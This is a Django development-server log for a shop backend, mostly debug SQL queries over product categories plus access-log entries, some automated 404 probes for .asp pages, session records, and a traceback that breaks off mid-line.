SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2020-01-02 07:02:08,063 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2020-01-02 07:02:08,069 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2020-01-02 07:02:08,075 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2020-01-02 07:02:08,079 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2020-01-02 07:02:08,085 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2020-01-02 07:02:08,091 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2020-01-02 07:02:08,096 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2020-01-02 07:02:08,100 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2020-01-02 07:02:08,105 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2020-01-02 07:02:08,109 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2020-01-02 07:02:08,116 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2020-01-02 07:02:08,123 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2020-01-02 07:02:08,128 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2020-01-02 07:02:08,132 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2020-01-02 07:02:08,136 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2020-01-02 07:02:08,140 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2020-01-02 07:02:08,148 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2020-01-02 07:02:08,154 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2020-01-02 07:02:08,157 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2020-01-02 07:02:08,159 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2020-01-02 07:02:08,162 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2020-01-02 07:02:08,166 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2020-01-02 07:02:08,168 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2020-01-02 07:02:08,171 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2020-01-02 07:02:08,173 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2020-01-02 07:02:08,180 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2020-01-02 07:02:08,187 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2020-01-02 07:02:08,193 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2020-01-02 07:02:08,197 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2020-01-02 07:02:08,200 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2020-01-02 07:02:08,203 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2020-01-02 07:02:08,206 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2020-01-02 07:02:08,211 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2020-01-02 07:02:08,214 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2020-01-02 07:02:08,217 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2020-01-02 07:02:08,220 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2020-01-02 07:02:08,222 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [02/Jan/2020 07:02:08] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [02/Jan/2020 07:02:09] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 200 387799 [02/Jan/2020 07:02:09] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 200 600645 [02/Jan/2020 07:02:16] "GET / HTTP/1.0" 302 0 DEBUG 2020-01-02 07:02:17,146 utils 2749 140297243715328 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'ij1rvjd7c5r6c62sve58x3x0rjffl1dy' LIMIT 1; args=('ij1rvjd7c5r6c62sve58x3x0rjffl1dy',) DEBUG 2020-01-02 07:02:17,147 utils 2749 140297243715328 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('ij1rvjd7c5r6c62sve58x3x0rjffl1dy', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-16T07:02:17.146448+00:00'::timestamptz); args=('ij1rvjd7c5r6c62sve58x3x0rjffl1dy', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 16, 7, 2, 17, 146448, tzinfo=)) [02/Jan/2020 07:02:17] "GET /login/?next=/ HTTP/1.0" 200 1786 [02/Jan/2020 07:02:17] "GET /static/admin/css/login.css HTTP/1.0" 200 1233 [02/Jan/2020 07:02:17] "GET /static/admin/css/base.css HTTP/1.0" 200 16378 [02/Jan/2020 07:02:17] "GET /static/admin/css/responsive.css HTTP/1.0" 200 17944 [02/Jan/2020 07:02:18] "GET /static/admin/css/fonts.css HTTP/1.0" 200 423 Not Found: /favicon.ico [02/Jan/2020 07:02:18] "GET /favicon.ico HTTP/1.0" 404 6346 [02/Jan/2020 07:02:18] "GET /static/admin/fonts/Roboto-Light-webfont.woff HTTP/1.0" 200 85692 [02/Jan/2020 07:02:18] "GET /static/admin/fonts/Roboto-Regular-webfont.woff HTTP/1.0" 200 85876 [02/Jan/2020 07:05:03] "GET / HTTP/1.0" 302 0 [02/Jan/2020 07:06:25] "GET / HTTP/1.0" 302 0 [02/Jan/2020 07:10:06] "GET / HTTP/1.0" 302 0 [02/Jan/2020 07:15:16] "GET / HTTP/1.0" 302 0 [02/Jan/2020 07:20:59] "GET / HTTP/1.0" 302 0 [02/Jan/2020 07:26:01] "GET / HTTP/1.0" 302 0 [02/Jan/2020 07:30:01] "GET /whm-server-status HTTP/1.0" 301 0 [02/Jan/2020 07:31:04] "GET / HTTP/1.0" 302 0 [02/Jan/2020 07:36:07] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [02/Jan/2020 07:37:47] "GET /robots.txt HTTP/1.0" 404 6341 [02/Jan/2020 07:37:53] "GET / HTTP/1.0" 302 0 [02/Jan/2020 07:41:09] "GET / HTTP/1.0" 302 0 [02/Jan/2020 07:46:12] "GET / HTTP/1.0" 302 0 [02/Jan/2020 07:48:33] "GET / HTTP/1.0" 302 0 DEBUG 2020-01-02 07:48:33,891 utils 2749 140297233225472 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '8e7wg8cyoyhndmggxy5ihb7kwiai7e3u' LIMIT 1; args=('8e7wg8cyoyhndmggxy5ihb7kwiai7e3u',) DEBUG 2020-01-02 07:48:33,892 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('8e7wg8cyoyhndmggxy5ihb7kwiai7e3u', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-16T07:48:33.891622+00:00'::timestamptz); args=('8e7wg8cyoyhndmggxy5ihb7kwiai7e3u', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 16, 7, 48, 33, 891622, tzinfo=)) [02/Jan/2020 07:48:33] "GET /login/?next=/ HTTP/1.0" 200 1786 [02/Jan/2020 07:51:31] "GET / HTTP/1.0" 302 0 [02/Jan/2020 07:56:34] "GET / HTTP/1.0" 302 0 [02/Jan/2020 08:05:03] "GET / HTTP/1.0" 302 0 [02/Jan/2020 08:13:41] "GET / HTTP/1.0" 302 0 [02/Jan/2020 08:18:43] "GET / HTTP/1.0" 302 0 [02/Jan/2020 08:23:46] "GET / HTTP/1.0" 302 0 [02/Jan/2020 08:28:48] "GET / HTTP/1.0" 302 0 [02/Jan/2020 08:33:51] "GET / HTTP/1.0" 302 0 Not Found: /bmxx/SendMail.asp [02/Jan/2020 08:37:29] "GET /bmxx/SendMail.asp?ArticleID=352 HTTP/1.0" 404 6376 Not Found: /dyzl/ShowArticle.asp [02/Jan/2020 08:37:31] "GET /dyzl/ShowArticle.asp?ArticleID=468 HTTP/1.0" 404 6385 Not Found: /xyzx/Comment.asp [02/Jan/2020 08:37:34] "GET /xyzx/Comment.asp?ArticleID=246 HTTP/1.0" 404 6373 Not Found: /xyzx/Comment.asp [02/Jan/2020 08:37:36] "GET /xyzx/Comment.asp?ArticleID=481 HTTP/1.0" 404 6373 Not Found: /newslist.asp [02/Jan/2020 08:39:39] "GET /newslist.asp?type=4&id=1235 HTTP/1.0" 404 6366 Not Found: /newslist.asp [02/Jan/2020 08:39:41] "GET /newslist.asp?type=4&id=1301 HTTP/1.0" 404 6366 [02/Jan/2020 08:42:08] "GET / HTTP/1.0" 302 0 [02/Jan/2020 08:49:51] "GET / HTTP/1.0" 302 0 [02/Jan/2020 08:54:53] "GET / HTTP/1.0" 302 0 [02/Jan/2020 08:59:56] "GET / HTTP/1.0" 302 0 [02/Jan/2020 09:05:03] "GET / HTTP/1.0" 302 0 [02/Jan/2020 09:10:06] "GET / HTTP/1.0" 302 0 [02/Jan/2020 09:15:08] "GET / HTTP/1.0" 302 0 Not Found: /dyzl/UploadFiles_3009/201701/2017010614504034.jpg [02/Jan/2020 09:15:54] "GET /dyzl/UploadFiles_3009/201701/2017010614504034.jpg HTTP/1.0" 404 6458 [02/Jan/2020 09:20:11] "GET / HTTP/1.0" 302 0 Not Found: /dyzl/ShowArticle.asp [02/Jan/2020 09:21:45] "GET /dyzl/ShowArticle.asp?ArticleID=442 HTTP/1.0" 404 6385 Not Found: /newslist.asp [02/Jan/2020 09:24:38] "GET /newslist.asp?type=1&id=60200 HTTP/1.0" 404 6367 Not Found: /newslist.asp [02/Jan/2020 09:24:40] "GET /newslist.asp?type=1&id=70200 HTTP/1.0" 404 6367 Not Found: /newslist.asp [02/Jan/2020 09:24:42] "GET /newslist.asp?type=4&id=1195 HTTP/1.0" 404 6366 Not Found: /newslist.asp [02/Jan/2020 09:24:44] "GET /newslist.asp?type=4&id=1303 HTTP/1.0" 404 6366 [02/Jan/2020 09:25:01] "GET /whm-server-status HTTP/1.0" 301 0 [02/Jan/2020 09:25:13] "GET / HTTP/1.0" 302 0 [02/Jan/2020 09:30:16] "GET / HTTP/1.0" 302 0 [02/Jan/2020 09:37:04] "GET / HTTP/1.0" 302 0 [02/Jan/2020 09:42:06] "GET / HTTP/1.0" 302 0 [02/Jan/2020 09:47:08] "GET / HTTP/1.0" 302 0 [02/Jan/2020 09:52:12] "GET / HTTP/1.0" 302 0 [02/Jan/2020 10:00:01] "GET / HTTP/1.0" 302 0 [02/Jan/2020 10:05:03] "GET / HTTP/1.0" 302 0 Not Found: /jspd/SendMail.asp [02/Jan/2020 10:05:07] "GET /jspd/SendMail.asp?ArticleID=173 HTTP/1.0" 404 6376 Not Found: /xyzx/ShowArticle.asp [02/Jan/2020 10:05:10] "GET /xyzx/ShowArticle.asp?ArticleID=269 HTTP/1.0" 404 6385 Not Found: /newslist.asp [02/Jan/2020 10:08:26] "GET /newslist.asp?type=1&?id=30000 HTTP/1.0" 404 6368 [02/Jan/2020 10:13:10] "GET / HTTP/1.0" 302 0 [02/Jan/2020 10:15:01] "GET /whm-server-status HTTP/1.0" 301 0 [02/Jan/2020 10:18:13] "GET / HTTP/1.0" 302 0 [02/Jan/2020 10:23:16] "GET / HTTP/1.0" 302 0 [02/Jan/2020 10:33:04] "GET / HTTP/1.0" 302 0 [02/Jan/2020 10:41:24] "GET / HTTP/1.0" 302 0 Not Found: /xyzx/SendMail.asp [02/Jan/2020 10:47:09] "GET /xyzx/SendMail.asp?ArticleID=481 HTTP/1.0" 404 6376 Not Found: /newslist.asp [02/Jan/2020 10:50:24] "GET /newslist.asp?type=2&id=20400 HTTP/1.0" 404 6367 Not Found: /newslist.asp [02/Jan/2020 10:50:26] "GET /newslist.asp?type=4&id=1089 HTTP/1.0" 404 6366 Not Found: /newslist.asp [02/Jan/2020 10:50:31] "GET /newslist.asp?type=4&id=1402 HTTP/1.0" 404 6366 Not Found: /xsyd/ShowArticle.asp [02/Jan/2020 10:50:43] "GET /xsyd/ShowArticle.asp?ArticleID=512 HTTP/1.0" 404 6385 [02/Jan/2020 10:51:22] "GET / HTTP/1.0" 302 0 [02/Jan/2020 10:56:25] "GET / HTTP/1.0" 302 0 [02/Jan/2020 11:05:03] "GET / HTTP/1.0" 302 0 [02/Jan/2020 11:10:05] "GET / HTTP/1.0" 302 0 [02/Jan/2020 11:15:08] "GET / HTTP/1.0" 302 0 [02/Jan/2020 11:20:11] "GET / HTTP/1.0" 302 0 Not Found: /bmxx/ShowArticle.asp [02/Jan/2020 11:24:07] "GET /bmxx/ShowArticle.asp?ArticleID=352 HTTP/1.0" 404 6385 Forbidden (CSRF cookie not set.): /api-token-auth/ [02/Jan/2020 11:24:39] "POST /api-token-auth/ HTTP/1.0" 403 2868 Not Found: /dtgh/UploadFiles_5967/201704/2017041121463242.jpg [02/Jan/2020 11:24:56] "GET /dtgh/UploadFiles_5967/201704/2017041121463242.jpg HTTP/1.0" 404 6458 Not Found: /xyzx/UploadFiles_7376/201609/2016091212225273.jpg [02/Jan/2020 11:25:00] "GET /xyzx/UploadFiles_7376/201609/2016091212225273.jpg HTTP/1.0" 404 6458 [02/Jan/2020 11:25:13] "GET / HTTP/1.0" 302 0 [02/Jan/2020 11:31:26] "GET / HTTP/1.0" 302 0 Not Found: /xyzx/Print.asp [02/Jan/2020 11:31:35] "GET /xyzx/Print.asp?ArticleID=246 HTTP/1.0" 404 6367 Forbidden (CSRF cookie not set.): /api-token-auth/ [02/Jan/2020 11:35:03] "POST /api-token-auth/ HTTP/1.0" 403 2868 Forbidden (CSRF cookie not set.): /api-token-auth/ [02/Jan/2020 11:35:15] "POST /api-token-auth/ HTTP/1.0" 403 2868 [02/Jan/2020 11:38:47] "GET / HTTP/1.0" 302 0 [02/Jan/2020 11:44:32] "GET / HTTP/1.0" 302 0 [02/Jan/2020 11:48:44] "GET / HTTP/1.0" 302 0 [02/Jan/2020 11:49:34] "GET / HTTP/1.0" 302 0 [02/Jan/2020 11:50:02] "GET /whm-server-status HTTP/1.0" 301 0 [02/Jan/2020 11:54:37] "GET / HTTP/1.0" 302 0 [02/Jan/2020 11:59:40] "GET / HTTP/1.0" 302 0 [02/Jan/2020 12:05:02] "GET / HTTP/1.0" 302 0 Not Found: /newslist.asp [02/Jan/2020 12:08:37] "GET /newslist.asp?type=1&id=60400 HTTP/1.0" 404 6367 [02/Jan/2020 12:10:01] "GET /whm-server-status HTTP/1.0" 301 0 [02/Jan/2020 12:10:05] "GET / HTTP/1.0" 302 0 [02/Jan/2020 12:15:08] "GET / HTTP/1.0" 302 0 Not Found: /User/User_Favorite.asp [02/Jan/2020 12:18:24] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1003&InfoID=240 HTTP/1.0" 404 6422 [02/Jan/2020 12:20:10] "GET / HTTP/1.0" 302 0 [02/Jan/2020 12:25:13] "GET / HTTP/1.0" 302 0 [02/Jan/2020 12:30:16] "GET / HTTP/1.0" 302 0 [02/Jan/2020 12:35:18] "GET / HTTP/1.0" 302 0 [02/Jan/2020 12:40:32] "GET / HTTP/1.0" 302 0 [02/Jan/2020 12:45:38] "GET / HTTP/1.0" 302 0 [02/Jan/2020 12:50:40] "GET / HTTP/1.0" 302 0 [02/Jan/2020 12:55:42] "GET / HTTP/1.0" 302 0 Not Found: /xsyd/SendMail.asp [02/Jan/2020 12:56:24] "GET /xsyd/SendMail.asp?ArticleID=513 HTTP/1.0" 404 6376 /home/resfx/public_html/admin.resfx.com/backend/shopapi/urls.py changed, reloading. Performing system checks... December 27, 2019 - 09:23:28 Django version 2.2.7, using settings 'django_shop_tutorial.settings' Starting development server at http://127.0.0.1:8000/ Quit the server with CONTROL-C. Watching for file changes with StatReloader Exception in thread django-main-thread: Traceback (most recent call last): File "/usr/local/lib/python3.6/threading.py", line 916, in _bootstrap_inner self.run() File "/usr/local/lib/python3.6/threading.py", line 864, in run self._target(*self._args, **self._kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/autoreload.py", line 54, in wrapper fn(*args, 